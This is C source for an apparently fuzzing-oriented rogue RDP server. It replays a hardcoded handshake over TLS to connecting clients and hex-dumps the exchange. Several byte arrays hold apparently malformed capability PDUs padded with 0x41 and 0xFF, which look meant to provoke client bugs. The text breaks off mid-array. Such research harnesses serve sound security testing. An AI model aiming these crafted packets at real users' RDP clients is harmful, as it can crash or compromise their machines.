#include<stdio.h>


#include "RdpServer.h"
#include <openssl/ssl.h>
#include <openssl/x509.h>
#include <openssl/err.h>
#include <stdio.h>
#include <stdlib.h>


#define DEFAULT_BUFLEN 4096
static SOCKET ListenSocket = INVALID_SOCKET;
static SOCKET ClientSocket = INVALID_SOCKET;


static SSL_CTX * ctx;
static SSL * ssl = NULL;
HANDLE hr = NULL;


void HexOutput(int length, unsigned char* buf)
{
	int i;
	char asc = '.';
	char line[100];
	memset(line, 0, 80);
	char *tmp = line;

	for (i = 0; i < length; i++)
	{
		if (!(i % 16))
		{
			line[57] = 0x20;
			i ? printf("%s\n", line) : 1;
			memset(line, 0x20, 80);
			tmp = line;
			sprintf_s(tmp, 10, "%.8x ", i);
			tmp += 9;
		}
		sprintf_s(tmp, 4, "%.2x ", buf[i]);
		if (buf[i] > 0x20 && buf[i] <= 0x7e)
			asc = buf[i];
		else
			asc = '.';
		sprintf_s(line + 58 + (i % 16), 2, "%c", asc);
		tmp += 3;
	}
	*tmp = 0x20;
	printf("%s\n", line);
}

void PrintReceiveData(int length, unsigned char* buf)
{
	// fuzz ״̬²ʾ
	printf("\n[+] Receive:  \n");
	HexOutput(length, buf);
	printf("[+] Bytes received: %d\n", length);
}

void PrintSentData(int length, unsigned char* buf)
{
	// fuzz ״̬²ʾ
	printf("\n[-] Sent:  \n");
	HexOutput(length, buf);
	printf("[-] Bytes Sent: %d\n", length);
}

const char *
$strerror(int err)
{
	static char* msg = NULL;
	switch (err) {
	default:
		if (msg == NULL)
			free(msg);
		FormatMessageA(
			FORMAT_MESSAGE_ALLOCATE_BUFFER |
			FORMAT_MESSAGE_FROM_SYSTEM |
			FORMAT_MESSAGE_IGNORE_INSERTS,
			NULL,
			err,
			MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
			(LPSTR)&msg,
			0, NULL);
		return msg;
		break;
	}
}

static void ssl_clear()
{
	if (ssl != NULL)
	{
		SSL_shutdown(ssl);
		SSL_free(ssl);
		ssl = NULL;
	}
	if (ClientSocket != INVALID_SOCKET)
	{
		closesocket(ClientSocket);
		ClientSocket = INVALID_SOCKET;
	}

	//closesocket(ListenSocket);
	//SSL_CTX_free(ctx);

	//EVP_cleanup();
}

static int ssl_recv_data(unsigned char *data, int data_length)
{
	int rcvd = 0;
	int ssl_err = 0;
	int erro = 0;
	int index = 0;

	while (data_length > 0)
	{
		rcvd = SSL_read(ssl, data, data_length);
		ssl_err = SSL_get_error(ssl, rcvd);
		int a = WSAGetLastError();
		if (ssl_err == SSL_ERROR_SSL)
		{
			if (SSL_get_shutdown(ssl) & SSL_RECEIVED_SHUTDOWN)
			{
				printf("Remote peer initiated ssl shutdown.\n");
				ssl_clear();
				return 0;
			}
			printf("ssl_err == SSL_ERROR_SSL\n");
			ssl_clear();
			return 0;
		}

		if (ssl_err == SSL_ERROR_WANT_READ || ssl_err == SSL_ERROR_WANT_WRITE)
		{
			rcvd = 0;
		}
		if (ssl_err != SSL_ERROR_NONE)
		{
			// printf(0, "SSL_read: %d (%s)\n", ssl_err, $strerror(WSAGetLastError()));
			printf("UNKNOWN - SSL - network error\n");
			printf("ssl_err != SSL_ERROR_NONE\n");
			ssl_clear();
			return 0;
		}
		data_length -= rcvd;
	}
	// printf("SSL_read over\n");
	return rcvd;
}

static  int respose_to_rdp_client(unsigned char *data, int data_length)
{
	int iSendResult = 0;

	iSendResult = SSL_write(ssl, data, data_length);

	if (iSendResult <= 0)
	{
		printf("SSL_write FAILD");
		// ERR_print_errors_fp(stdout);
		ssl_clear();
		return -1;
	}
	// mychange
	PrintSentData(iSendResult, data);

	return 0;
}

static int ssl_recv_loop(unsigned char *recvbuf, unsigned char* channel)
{
	int index = 0;
	UINT8 version = 0;
	UINT16 data_length = 0;
	int iResult = 0;
	int i = 0;

	memset(recvbuf, 0, DEFAULT_BUFLEN);

	if (!ssl_recv_data(recvbuf, 4))
		return 0;
	// mychange
	printf("\n[+] Head:\n");
	printf("%.8x ", 0);
	for (int j = 0; j < 4; j++)
	{
		printf("%.2x ", recvbuf[j]);
	}
	//PrintReceiveData(4, recvbuf);

	version = recvbuf[index];
	if (version == 3)
	{
		index += 2;
		data_length = (recvbuf[index] << 8) | recvbuf[index + 1];
	}
	else if (version != 3)
	{
		index += 1;
		if (recvbuf[index] >= 0x80)
		{
			//index += 1;
			unsigned char data1 = recvbuf[index] - 0x80;
			data_length = (data1 << 8) | recvbuf[index + 1];
		}
		else
		{
			data_length = recvbuf[index];
		}
	}

	memset(recvbuf, 0, 4);

	iResult = ssl_recv_data(recvbuf, data_length - 4);

	// mychange
	PrintReceiveData(iResult, recvbuf);
	if (version == 3)
	{
		*channel = recvbuf[7];
	}

	// mychange
	return iResult;
}

static int ssl_established()
{
	ssl = SSL_new(ctx);
	SSL_set_fd(ssl, ClientSocket);

	if (SSL_accept(ssl) <= 0)
	{
		printf("sslssl_u_stdw_clear\n");
		ssl_clear();
		return -1;
	}
	else
	{
		printf("sslӳɹ\n");
		return 0;
	}
}

int start_establish()
{
	unsigned char recvbuf[DEFAULT_BUFLEN];
	int recvbuflen = DEFAULT_BUFLEN;
	unsigned char name_respose[] = { 0x03, 00, 00, 0x13, 0x0e, 0xd0, 00, 00, 0x12, 0x34, 00, 0x02, 0x1f, 0x08, 00, 0x01, 00, 00, 00 };
	// unsigned char name_respose[] = { 0x03, 00, 00, 0x13, 0x0e, 0xd0, 00, 00, 0x12, 0x34, 00, 0x02, 0x01, 0x08, 00, 0x01, 00, 00, 00 };//win7

	int i = 0;
	int iSendResult = 0;
	int iRecvResult = 0;
	iRecvResult = recv(ClientSocket, (char*)recvbuf, recvbuflen, 0);

	if (iRecvResult > 0)
	{
		PrintReceiveData(iRecvResult, recvbuf);

		iSendResult = send(ClientSocket, (const char*)name_respose, 19, 0);
		if (iSendResult == SOCKET_ERROR) {
			printf("send failed with error: %d\n", WSAGetLastError());
			closesocket(ClientSocket);
			WSACleanup();
			return -1;
		}
		// mychange
		PrintSentData(iSendResult, name_respose);
		return 0;
	}
	else
	{
		printf("start establish failed!\n");
		return -1;
	}
}

static int recv_loop()
{
	unsigned char recvbuf[DEFAULT_BUFLEN];
	int iResult = 0;
	//[DEFAULT_BUFLEN];
	UINT8 version = 0;;
	UINT16 data_length = 0;
	unsigned char mcs_connect[] = {
		0x03, 00, 00, 0x7e, 0x02, 0xf0, 0x80, 0x7f, 0x66, 0x74, 0x0a, 0x01, 00, 0x02, 0x01, 00, 0x30, 0x1a, 0x02, 0x01, 0x22, 0x02,
		0x01, 0x03, 0x02, 0x01, 00, 0x02, 0x01, 0x01, 0x02, 0x01, 00, 0x02, 0x01, 0x01, 0x02, 0x03, 00, 0xff, 0xf8, 0x02, 0x01,
		0x02, 0x04, 0x50, 00, 0x05, 00, 0x14, 0x7c, 00, 0x01, 0x2a, 0x14, 0x76, 0x0a, 0x01, 0x01, 00, 0x01, 0xc0, 00, 0x4d, 0x63,
		0x44, 0x6e, 0x3a, 0x01, 0x0c, 0x10, 00, 0x0c, 00, 0x08, 00, 0x0b, 00, 00, 00, 0x06, 00, 00, 00, 0x03, 0x0c, 0x10, 00, 0xeb,
		0x03, 0x04, 00, 0xec, 0x03, 0xed, 0x03, 0xee, 0x03, 0xef, 0x03, 0x02, 0x0c, 0x0c, 00, 00, 00, 00, 00, 00, 00, 00, 00, 0x04,
		0x0c, 0x06, 00, 0xf0, 0x03, 0x08, 0x0c, 0x08, 00, 0x01, 0x03, 00, 00
	};
	unsigned char mcs_connect_id[] = {
	0x03, 00, 00, 0x0b, 0x02, 0xf0, 0x80, 0x2e, 00, 00, 0x08 };
	unsigned char mcs_connect_channel_1[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xf1, 0x03, 0xf1 };
	unsigned char mcs_connect_channel_2[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xeb, 0x03, 0xeb };
	unsigned char mcs_connect_channel_3[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xf0, 0x03, 0xf0 };
	unsigned char mcs_connect_channel_4[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xec, 0x03, 0xec };
	unsigned char mcs_connect_channel_5[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xed, 0x03, 0xed };
	unsigned char mcs_connect_channel_6[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xee, 0x03, 0xee };
	unsigned char mcs_connect_channel_7[] = {
	0x03, 00, 00, 0x0f, 0x02, 0xf0, 0x80, 0x3e, 00, 00, 0x08, 0x03, 0xef, 0x03, 0xef };

	unsigned char server_license[] = {
	0x03, 00, 00, 0x22, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xeb, 0x70, 0x14, 0x80, 00, 00, 00, 0xff, 0x03, 0x10, 00, 0x07, 00,
	00, 00, 0x02, 00, 00, 00, 0x04, 00, 00, 00 };

	unsigned char Multitransport_Request[] = {
	 0x03, 00, 00, 0x2a, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xf0, 0x70, 0x1c, 0x02, 00, 00, 00, 0x02, 00, 00, 00, 0x01, 00, 00,
	 00, 0x2d, 0xcb, 0xb3, 0xa1, 0x36, 0x51, 0xe2, 0xa4, 0x24, 0xe8, 0x43, 0x7c, 0x15, 0x11, 0x14, 0x31 };

	unsigned char hexData[109] = {
		0x6B, 0x00, 0xE7, 0x00, 0x33, 0x75, 0x05, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50,
		0x17, 0x01, 0x00, 0x00, 0x00, 0x00, 0x6D, 0xED, 0xFF, 0xED, 0xFB, 0x17, 0x00, 0x02, 0x50, 0x17,
		0x01, 0x00, 0x00, 0x00, 0x00, 0x6D, 0xED, 0xFF, 0xED, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41,
		0x41, 0x41, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41,
		0x41, 0x41, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50, 0x17, 0x01, 0x00, 0x41, 0x41,
		0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xFF, 0xFF, 0xFF,
		0xFF, 0xFF, 0xE8, 0x4B, 0x7D, 0x6D, 0x00, 0x41, 0x41, 0xDA, 0x62, 0x00, 0x52
	};

	unsigned char hexDassta[102] = {
		0x64, 0x00, 0xE7, 0x00, 0x33, 0x75, 0x05, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50,
		0x17, 0x01, 0x00, 0x00, 0x00, 0x00, 0x6D, 0xED, 0xFF, 0xED, 0x2E, 0x4A, 0x00, 0x02, 0x50, 0x17,
		0x03, 0xE8, 0xED, 0xFF, 0xED, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x0B, 0xFF,
		0xE9, 0x31, 0xF7, 0x18, 0x00, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x0B, 0xFF,
		0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50, 0x17, 0x01, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
		0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xE8, 0x4B,
		0x7D, 0x6D, 0x00, 0x41, 0x41, 0xDA
	};

	unsigned char server_confirm_active_r2[] = { 0x03, 00, 0x00, 0x74, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xeb, 0x70, 0x66, 0x64, 0x00, 0xE7, 0x00, 0x33, 0x75, 0x05, 0x0B, 0xFF, 0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50,
		0x17, 0x01, 0x00, 0x00, 0x00, 0x00, 0x6D, 0xED, 0xFF, 0xED, 0x2E, 0x4A, 0x00, 0x02, 0x50, 0x17,
		0x03, 0xE8, 0xED, 0xFF, 0xED, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x0B, 0xFF,
		0xE9, 0x31, 0xF7, 0x18, 0x00, 0x12, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x0B, 0xFF,
		0xE9, 0x31, 0xF7, 0x18, 0x00, 0x02, 0x50, 0x17, 0x01, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
		0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xE8, 0x4B,
		0x7D, 0x6D, 0x00, 0x41, 0x41, 0xDA };

	unsigned char server_confirm_active_r[] = { 0x03, 00, 0x00, 0x61, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xeb, 0x70, 0x53, 0x53, 0x00,
	0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x73, 0x67, 0x7F, 0x67, 0x67, 0x67, 0x02, 0x00, 0x67, 0x40,
		0x00, 0x00, 0x00, 0x64, 0x67, 0x67, 0x61, 0xB3, 0x01, 0x52, 0x00, 0x01, 0x52, 0x00, 0x01, 0xFF,
		0x33, 0x17, 0x00, 0x05, 0x00, 0x00, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x02, 0x00,
		0x67, 0x67, 0x67, 0x67, 0x01, 0x64, 0x67, 0x67, 0x61, 0x67, 0x7F, 0x60, 0x47, 0x67, 0x67, 0xFF,
		0x12, 0x40, 0xEA, 0x03, 0xEA, 0x03, 0xEA, 0x03, 0x98, 0x98, 0x98, 0x98, 0x98, 0x98, 0x98, 0x98,
		0x5D };

	unsigned char hexData88[44] = {
		0xE7, 0xD4, 0xD4, 0xD4, 0xB3, 0xD4, 0x20, 0xFF, 0xFF, 0x00, 0xEA, 0x00, 0x02, 0x00, 0x00, 0x01,
		0x00, 0x00, 0x7F, 0xE8, 0xFF, 0xD4, 0xD4, 0xD4, 0x2E, 0x10, 0x00, 0x82, 0x7F, 0xFF, 0xFF, 0xFF,
		0xB3, 0xD4, 0x00, 0xFF, 0xFF, 0x00, 0xEA, 0x00, 0x02, 0x00, 0x00, 0x01
	};

	unsigned char server_demand[] = {
	0x03, 00, 0x01, 0xd8, 0x02, 0xf0, 0x80, 0x68, 00, 0x01, 0x03, 0xeb, 0x70, 0x81, 0xc9, 0xc9, 0x01, 0x11, 00,
	0xea, 0x03, 0xea, 0x03, 0x01, 00, 0x04, 00, 0xb3, 0x01, 0x52, 0x44, 0x50, 00, 0x11, 00, 00, 00, 0x09, 00,
	0x08, 00, 0xea, 0x03, 00, 00, 0x01, 00, 0x18, 00, 0x01, 00, 0x03, 00, 00, 0x02, 00, 00, 00, 00, 0x1d, 0x04,
	00, 00, 00, 00, 00, 00, 0x01, 0x01, 0x14, 00, 0x0c, 00, 0x02, 00, 00, 00, 0x40, 0x06, 00, 00, 0x0a, 00, 0x08,
	00, 0x06, 00, 00, 00, 0x08, 00, 0x0a, 00, 0x01, 00, 0x19, 00, 0x19, 00, 0x1b, 00, 0x06, 00, 0x03, 00, 0x0e,
	00, 0x08, 00, 0x01, 00, 00, 00, 0x02, 00, 0x1c, 00, 0x20, 00, 0x01, 00, 0x01, 00, 0x01, 00, 0x80, 0x07, 0x38,
	0x04, 00, 00, 0x01, 00, 0x01, 00, 00, 0x1e, 0x01, 00, 00,
	00, 0x1d, 00, 0x60, 00, 0x04, 0xb9, 0x1b, 0x8d, 0xca,
	0x0f, 00, 0x4f, 0x15, 0x58, 0x9f, 0xae, 0x2d, 0x1a, 0x87, 0xe2, 0xd6, 00, 0x03, 00, 0x01, 0x01, 0x03, 0x12, 0x2f,
	0x77, 0x76,
	0x72, 0xbd, 0x63, 0x44, 0xaf, 0xb3, 0xb7, 0x3c, 0x9c, 0x6f, 0x78, 0x86, 00, 0x04, 00, 00, 00, 00, 00,
	0xa6, 0x51, 0x43, 0x9c, 0x35, 0x35, 0xae, 0x42, 0x91, 0x0c, 0xcd, 0xfc, 0xe5, 0x76, 0x0b, 0x58, 00, 0x04, 00, 00,
	00, 00, 00, 0xd4, 0xcc, 0x44, 0x27, 0x8a, 0x9d, 0x74, 0x4e, 0x80, 0x3c, 0x0e, 0xcb, 0xee, 0xa1, 0x9c, 0x54, 00,
	0x04, 00, 00, 00, 00, 00, 0x03, 00, 0x58, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 0x40,
	0x42, 0x0f, 00, 0x01, 00, 0x14, 00, 00, 00, 0x01, 00, 00, 00, 0xaa, 00, 0x01, 0x01, 0x01, 0x01, 0x01, 00, 00, 00,
	0x01, 00, 00, 0x01, 00, 00, 00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 00, 0x01, 0x01, 0x01, 0x01, 00, 00,
	00, 00, 0xa1, 0x06, 0x06, 00, 0x40, 0x42, 0x0f, 00, 0x40, 0x42, 0x0f, 00, 0x01, 00, 00, 00, 00, 00, 00, 00, 0x12,
	00, 0x08, 00, 0x01, 00, 00, 00, 0x0d, 00, 0x58, 00, 0x75, 0x03, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00,
	00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00,
	00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00,
	00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 0x17, 00, 0x08, 00, 0xff, 00, 00, 00, 0x18, 00, 0x0b, 00, 0x02, 00, 00,
	00, 0x03, 0x0c, 00, 0x1a, 00, 0x08, 00, 0x2b, 0x48, 0x09, 00, 0x1c, 00, 0x0c, 00, 0x52, 00, 00, 00, 00, 00, 00, 00,
	0x1e, 00, 0x08, 00, 00, 00, 00, 00, 00, 00, 00, 00 };

	unsigned char p1[] = {
	0x03,00,00,0x24,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x16,0x16,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x16,00,0x1f,00,00,00,0x01,00,00,00 };
	unsigned char p2[] = {
	0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x14,00,00,00,0x04,00,00,00,00,00,00,00 };
	unsigned char p3[] = {
	0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x14,00,00,00,0x02,00,0xf1,0x03,0xea,0x03,00,00 };
	unsigned char p4[] = {
	0x03,00,00,0x28,0x02,0xf0,0x80,0x68,00,0x01,0x03,0xeb,0x70,0x1a,0x1a,00,0x17,00,0xea,0x03,0xea,0x03,0x01,00,00,0x02,0x1a,00,0x28,00,00,00,00,00,00,00,0x03,00,0x04,00 };




	//int index = 0;
	unsigned char channel = 0;

	//printf("ssl_recv_data header\n");
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;

	respose_to_rdp_client(mcs_connect, 126);

	// Channel Connection 
	printf("\n**********************************\n");
	printf("[*] Channel Connection\n");
	printf("**********************************\n");
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_id, 11);


	// add channel 
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_1, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_2, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_3, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	respose_to_rdp_client(mcs_connect_channel_4, 15);

	/*
	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	respose_to_rdp_client(mcs_connect_channel_5, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	respose_to_rdp_client(mcs_connect_channel_6, 15);

	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	respose_to_rdp_client(mcs_connect_channel_7, 15);
	*/

	// Client Info PDU
	printf("\n**********************************\n");
	printf("[*] Client Info PDU\n");
	printf("**********************************\n");
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;

	// Licensing
	printf("\n**********************************\n");
	printf("[*] Licensing\n");
	printf("**********************************\n");
	respose_to_rdp_client(server_license, 34);

	// capabilities Exchange
	printf("\n**********************************\n");
	printf("[*] Capabilities Exchange\n");
	printf("**********************************\n");
	respose_to_rdp_client(server_demand, 472);
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;


	// Connection Finalization
	printf("\n**********************************\n");
	printf("[*] Connection Finalization\n");
	printf("**********************************\n");
	// Client Synchronize PDU
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	// Client Control PDU - Cooperate
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	// Client Control PDU - Request Control
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;

	// Persistent Key List PDU
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;
	/*
	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	if (!ssl_recv_loop(recvbuf, &channel))
	   return 0;
	*/

	// Client Font List PDU
	if (!ssl_recv_loop(recvbuf, &channel))
		return 0;

	// Server Synchronize PDU
	respose_to_rdp_client(p1, 36);
	// Server Control PDU - Cooperate
	respose_to_rdp_client(p2, 40);
	// Server Control PDU - Granted Control
	respose_to_rdp_client(p3, 40);
	// Server Font Map PDU
	respose_to_rdp_client(p4, 40);

	printf("\n**********************************\n");
	printf("[*] Connection Over\n");
	printf("**********************************\n");
	unsigned char img1[] = { 0x03,0x00,0x17,0x25,0x02,0xf0,0x80,0x68,0x00,0x01,0x03,0xeb,0x70,0x97,0x16,0x16,0x00,0x17,0x00,0xea,0x03,0xea,0x03,0x01,0x00,
	0x06,0x02,0x16,0x00,0x02,0x00,0x16,0x00,0x03,0x00,0x33,0xd9,0xba,0x0f,0x17,0x00,0xea,0x03,0xea,0x03,0x01,0x00,0x33,0x02,0xce,0x1b,0x02,0x23,0xba,0x0f,0x12,0xe1,0x00,0x00,0x06,0x84,0x98,0x00,0x19,0xd9,0x0d,0x80,0x00,0x00,0x00,0x00,0xc2,0x40,0x08,0x03,0x01,0x44,0x00,0x50,0x02,0xaf,0xf7,0xf0,0xc8,0x27,0xd2,0x8f,0x89,0x03,0xa1,0xa7,0x00,0x34,0x01,0x00,0x11,0x00,0x1a,0x65,0xfd,0xfc,0xd8,0x07,0xe9,0x3f,0x65,0x04,0x00,0x10,0x02,0x7e,0xc9,0x00,0xfd,0x79,0x1a,0x80,0x7e,0x07,0xe4,0x90,0xd0,0xa0,0xc0,0xcb,0xf8,0x1d,0xfc,0x08,0x00,0x10,0x00,0x0c,0x18,0x00,0x02,0x01,0xf0,0x80,0x40,0x00,0x01,0x20,0x01,0x9f,0x2a,0x3e,0x8a,0xf8,0x01,0x01,0x00,0xfa,0x21,0x10,0xc7,0xc0,0x10,0x6f,0xe8,0x04,0x2a,0x00,0x02,0x01,0x00,0x01,0x0c,0x00,0xf9,0x31,0xfa,0x01,0x47,0xa2,0x5e,0x0b,0x08,0x80,0x26,0xb5,0x88,0x87,0xdb,0x84,0x04,0x6e,0x02,0x27,0xd7,0x0b,0x78,0x7d,0xfe,0xfe,0x22,0x1a,0x02,0x21,0x71,0x11,0x3f,0x10,0x01,0xb8,0x07,0x0a,0x49,0x44,0x43,0xee,0x01,0xc1,0xf7,0x21,0x13,0xeb,0x95,0xc4,0x34,0x72,0xcf,0xf6,0x81,0xd7,0x31,0x13,0xa0,0x10,0xc8,0xf5,0xdc,0x0a,0xff,0x7f,0x25,0x3f,0xf3,0x38,0x03,0xc7,0x90,0x00,0x01,0xe2,0xdc,0xbc,0x7c,0xf1,0xbc,0x79,0xfe,0x9d,0x41,0x24,0x41,0x80,0xa8,0x08,0x8e,0xf7,0xfb,0xfc,0x12,0x75,0x1d,0x9d,0x47,0x6f,0xf7,0xf1,0xcb,0x3d,0x3e,0x3d,0x77,0x83,0x8a,0x49,0x53,0x5a,0xfe,0x64,0x47,0xae,0xf1,0xeb,0xb8,0x00,0x01,0x40,0x0c,0x77,0xe4,0xc4,0x7a,0xef,0xf5,0xe3,0xf3,0xe1,0xf4,0xab,0xef,0xc7,0x89,0x63,0xe4,0x65,0xf6,0x2b,0xf5,0x64,0x00,0x1e,0xa0,0x53,0xe9,0xb0,0x05,0xe0,0x1c,0x01,0x13,0xf5,0x47,0xc4,0x36,0x47,0xae,0xe3,0xcd,0xbf,0x11,0x4f,0x81,0x08,0x02,0x17,0x83,0x17,0x84,0x38,0xdf,0xef,0xe0,0x5f,0x10,0x09,0xf1,0x00,0xcc,0x0b,0xd3,0xa8,0xed,0x00,0xc2,0x75,0x1d,0xb8,0x20,0x00,0xd0,0x00,0x6f,0xf7,0xfa,0x00,0x0a,0x6b,0x58,0xf4,0x05,0x35,0xae,0x9f,0x63,0x18,0x01,0xbe,0xd3,0xd6,0x69,0xc0,0x00,0x11,0x21,0x49,0x2f,0x88,0xe3,0xc0,0xef,0x87,0x3f,0x16,0xbe,0x94,0x7c,0x48,0x1c,0xb3,0xdf,0xef,0xfe,0x78,0x8a,0x6c,0x29,0x48,0x00,0x16,0x0b,0xf4,0xa3,0xe2,0x50,0x55,0x1e,0x4f,0x74,0x00,0x1a,0x40,0x35,0x1f,0xfd,0xf5,0x5a,0x8f,0x5d,0xc0,0xfe,0x55,0x3e,0x00,0x80,0x54,0x1a,0x24,0xf7,0x4f,0x9d,0x97,0xd7,0x8f,0xbe,0x7b,0xf9,0x11,0xf1,0x17,0x80,0x0a,0x83,0x8c,0x9e,0xe9,0xf3,0xb2,0xfa,0x60,0x00,0x06,0x9f,0x57,0x09,0xda,0xbe,0x28,0x0b,0xc5,0x00,0x4a,0x6c,0x08,0x40,0x00,0x05,0xbd,0x35,0xac,0x09,0xbe,0xff,0x7f,0x00,0x0f,0x76,0x4d,0x6b,0xa0,0x01,0xdf,0xef,0xf4,0x74,0xd6,0xbb,0xed,0x00,0x05,0x66,0x9c,0x03,0x7d,0x31,0x01,0xf3,0xfa,0x80,0x03,0xe8,0x04,0x26,0xff,0x7f,0x14,0x92,0xfc,0x28,0xf8,0x95,0xe6,0x88,0xa7,0xc2,0x94,0x80,0xe0,0x23,0x96,0x72,0xf0,0x38,0x08,0xa4,0x97,0xd9,0xc0,0x38,0x30,0xe5,0x9f,0xce,0x35,0xf1,0xa0,0x22,0x04,0x72,0x06,0x72,0x06,0x00,0x03,0x4a,0xf1,0x54,0x15,0x05,0x94,0x04,0xc0,0xfe,0x84,0x1c,0x81,0x84,0x79,0x00,0x0e,0x50,0x3d,0x77,0x6e,0x01,0xf3,0xc8,0x33,0xca,0x53,0xf1,0x6f,0xe3,0xe2,0x00,0x00,0x29,0xf3,0x2c,0xa3,0xe4,0x5f,0xa8,0xa5,0xa7,0xe6,0x80,0xfe,0x28,0x75,0x00,0xb0,0x0c,0xb7,0xe6,0x00,0x38,0x25,0x04,0x3d,0x12,0x06,0xe0,0x9c,0x19,0x82,0x78,0xd2,0x23,0xd7,0x7b,0xfd,0xfd,0xc0,0x72,0xce,0x09,0xe4,0xd0,0x27,0x97,0x40,0x90,0x51,0xcb,0x3f,0xc2,0x8f,0x89,0x0e,0x5c,0x19,0xa8,0x09,0xc7,0xd5,0x6a,0x35,0x8c,0x61,0xcd,0x35,0xac,0x4a,0xfa,0xf5,0xea,0x7c,0x3d,0x49,0x87,0xad,0x6b,0xd5,0x5d,0x1e,0xa5,0xaf,0x58,0xbc,0x36,0xf5,0x66,0xc3,0x30,0x9f,0x27,0xc7,0x90,0xab,0xe3,0x47,0xce,0x81,0xd8,0x7f,0x08,0xda,0xfa,0x11,0xec,0x37,0xd3,0x7c,0xaa,0xf8,0xd1,0xf3,0x40,0x01,0xb0,0x50,0x00,0x0f,0x99,0x1f,0x72,0x02,0xe1,0x3e,0xdc,0x8f,0x9d,0x5f,0x1a,0x3e,0x74,0x05,0x40,0xb8,0x14,0xc0,0x3f,0xe6,0xcc,0x36,0x13,0xfb,0x23,0xfe,0x47,0xc8,0xc8,0x2e,0x0a,0x72,0x07,0xfc,0xa2,0x3d,0x77,0x39,0x03,0x13,0xfc,0x1c,0x61,0x90,0x7f,0xd9,0x87,0xf8,0xa0,0xaf,0xc8,0xf0,0xf4,0x7f,0x68,0xf9,0x18,0x05,0x04,0x7e,0x5d,0xc3,0xb8,0x9e,0x3f,0x7c,0x79,0x86,0x3c,0x03,0x1f,0xa6,0xbe,0x34,0x47,0xae,0